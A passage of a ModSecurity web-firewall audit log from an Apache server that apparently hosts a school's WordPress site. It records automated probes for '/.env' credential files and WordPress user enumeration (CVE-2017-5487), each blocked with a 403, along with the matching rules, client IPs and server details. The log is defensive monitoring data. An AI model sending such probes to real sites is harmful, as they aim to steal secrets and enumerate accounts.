Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748843216631304 2987 (- - -) Stopwatch2: 1748843216631304 2987; combined=1358, p1=427, p2=898, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f4adc01-Z-- --62172c3a-A-- [02/Jun/2025:13:02:36 +0700] aD0-fH8VMK8tZef_-m_gbQAAAFQ 103.236.140.4 59084 103.236.140.4 8181 --62172c3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.183.203.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.183.203.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62172c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62172c3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748844156970172 3610 (- - -) Stopwatch2: 1748844156970172 3610; combined=1463, p1=484, p2=947, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62172c3a-Z-- --b4a4300f-A-- [02/Jun/2025:13:09:42 +0700] aD1AJn8VMK8tZef_-m_gdgAAAEw 103.236.140.4 59168 103.236.140.4 8181 --b4a4300f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --b4a4300f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4a4300f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748844582450660 793 (- - -) Stopwatch2: 1748844582450660 793; combined=342, p1=309, p2=0, p3=0, p4=0, p5=33, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4a4300f-Z-- --538ba47e-A-- [02/Jun/2025:13:28:50 +0700] aD1Eou6eDjh4wF4csdt72wAAAJE 103.236.140.4 59470 103.236.140.4 8181 --538ba47e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.155.62.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.155.62.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --538ba47e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --538ba47e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748845730414884 2876 (- - -) Stopwatch2: 1748845730414884 2876; combined=1288, p1=443, p2=817, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --538ba47e-Z-- --e364b26e-A-- [02/Jun/2025:14:03:18 +0700] aD1Mtu6eDjh4wF4csdt8mAAAAIg 103.236.140.4 33480 103.236.140.4 8181 --e364b26e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.199.250.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.199.250.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e364b26e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e364b26e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748847798808270 2682 (- - -) Stopwatch2: 1748847798808270 2682; combined=1432, p1=442, p2=953, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e364b26e-Z-- --f9a55753-A-- [02/Jun/2025:14:27:19 +0700] aD1SV-6eDjh4wF4csduEKAAAAI0 103.236.140.4 47116 103.236.140.4 8181 --f9a55753-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.233.242.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.233.242.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9a55753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a55753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748849239650760 3075 (- - -) Stopwatch2: 1748849239650760 3075; combined=1307, p1=444, p2=834, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a55753-Z-- --e1ab8f1a-A-- [02/Jun/2025:14:34:17 +0700] aD1T-X8VMK8tZef_-m_l9wAAAFA 103.236.140.4 47154 103.236.140.4 8181 --e1ab8f1a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.80.184.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.80.184.168 X-Forwarded-Proto: http Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: */* --e1ab8f1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1ab8f1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748849657261002 719 (- - -) Stopwatch2: 1748849657261002 719; combined=281, p1=248, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1ab8f1a-Z-- --c0f86875-A-- [02/Jun/2025:14:45:00 +0700] aD1WfH8VMK8tZef_-m_mAAAAAEk 103.236.140.4 47194 103.236.140.4 8181 --c0f86875-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Accept-Charset: utf-8 --c0f86875-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0f86875-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748850300981277 808 (- - -) Stopwatch2: 1748850300981277 808; combined=318, p1=278, p2=0, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0f86875-Z-- --301afd43-A-- [02/Jun/2025:15:13:15 +0700] aD1dG9G4Cudp_oIcbnPA2wAAABY 103.236.140.4 48208 103.236.140.4 8181 --301afd43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.170 Accept-Charset: utf-8 --301afd43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --301afd43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748851995758707 789 (- - -) Stopwatch2: 1748851995758707 789; combined=324, p1=272, p2=0, p3=0, p4=0, p5=52, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --301afd43-Z-- --ff3f5b16-A-- [02/Jun/2025:15:31:48 +0700] aD1hdO6eDjh4wF4csduEeAAAAJI 103.236.140.4 48258 103.236.140.4 8181 --ff3f5b16-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ff3f5b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff3f5b16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748853108892556 926 (- - -) Stopwatch2: 1748853108892556 926; combined=343, p1=300, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff3f5b16-Z-- --a3a92e06-A-- [02/Jun/2025:15:32:39 +0700] aD1hp-6eDjh4wF4csduEeQAAAJc 103.236.140.4 48260 103.236.140.4 8181 --a3a92e06-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) Accept-Charset: utf-8 --a3a92e06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3a92e06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748853159773607 937 (- - -) Stopwatch2: 1748853159773607 937; combined=349, p1=306, p2=0, p3=0, p4=0, p5=43, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3a92e06-Z-- --1c453130-A-- [02/Jun/2025:15:52:00 +0700] aD1mMEA6be0-boUGPH2USgAAANc 103.236.140.4 48482 103.236.140.4 8181 --1c453130-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --1c453130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c453130-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748854320791279 908 (- - -) Stopwatch2: 1748854320791279 908; combined=358, p1=313, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c453130-Z-- --af031d0b-A-- [02/Jun/2025:16:01:59 +0700] aD1oh-6eDjh4wF4csduEjQAAAIw 103.236.140.4 48584 103.236.140.4 8181 --af031d0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 UBrowser/5.6.13705.206 Safari/537.36 Accept-Charset: utf-8 --af031d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af031d0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748854919144801 891 (- - -) Stopwatch2: 1748854919144801 891; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af031d0b-Z-- --ed37331d-A-- [02/Jun/2025:16:05:03 +0700] aD1pP-6eDjh4wF4csduEkgAAAJU 103.236.140.4 48632 103.236.140.4 8181 --ed37331d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.28.124 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.28.124 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ed37331d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed37331d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748855103351937 796 (- - -) Stopwatch2: 1748855103351937 796; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed37331d-Z-- --51860410-A-- [02/Jun/2025:16:25:48 +0700] aD1uHH8VMK8tZef_-m_mwgAAAEU 103.236.140.4 48758 103.236.140.4 8181 --51860410-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.112.207.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.112.207.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --51860410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51860410-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748856348992847 3344 (- - -) Stopwatch2: 1748856348992847 3344; combined=1467, p1=516, p2=917, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51860410-Z-- --46c63e64-A-- [02/Jun/2025:17:06:27 +0700] aD13ou6eDjh4wF4csduEsgAAAIE 103.236.140.4 48930 103.236.140.4 8181 --46c63e64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46c63e64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46c63e64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748858786998728 2834 (- - -) Stopwatch2: 1748858786998728 2834; combined=1343, p1=445, p2=867, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46c63e64-Z-- --190efe5d-A-- [02/Jun/2025:17:38:35 +0700] aD1_K9G4Cudp_oIcbnPBVQAAAA4 103.236.140.4 49202 103.236.140.4 8181 --190efe5d-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 146.190.242.161 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 146.190.242.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --190efe5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --190efe5d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748860715278449 737 (- - -) Stopwatch2: 1748860715278449 737; combined=296, p1=261, p2=0, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --190efe5d-Z-- --f0c52c0c-A-- [02/Jun/2025:17:39:28 +0700] aD1_YEA6be0-boUGPH2UaQAAAMQ 103.236.140.4 49230 103.236.140.4 8181 --f0c52c0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Baiduspider ( http://www.baidu.com/search/spider.htm) Accept-Charset: utf-8 --f0c52c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0c52c0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748860768339028 734 (- - -) Stopwatch2: 1748860768339028 734; combined=319, p1=280, p2=0, p3=0, p4=0, p5=38, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0c52c0c-Z-- --a864c90d-A-- [02/Jun/2025:17:51:37 +0700] aD2COdG4Cudp_oIcbnPBaQAAABQ 103.236.140.4 49444 103.236.140.4 8181 --a864c90d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --a864c90d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a864c90d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748861497590350 912 (- - -) Stopwatch2: 1748861497590350 912; combined=403, p1=365, p2=0, p3=0, p4=0, p5=38, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a864c90d-Z-- --d33b1c3c-A-- [02/Jun/2025:18:04:33 +0700] aD2FQdG4Cudp_oIcbnPBmAAAAAg 103.236.140.4 49696 103.236.140.4 8181 --d33b1c3c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 4.38.207.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 4.38.207.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 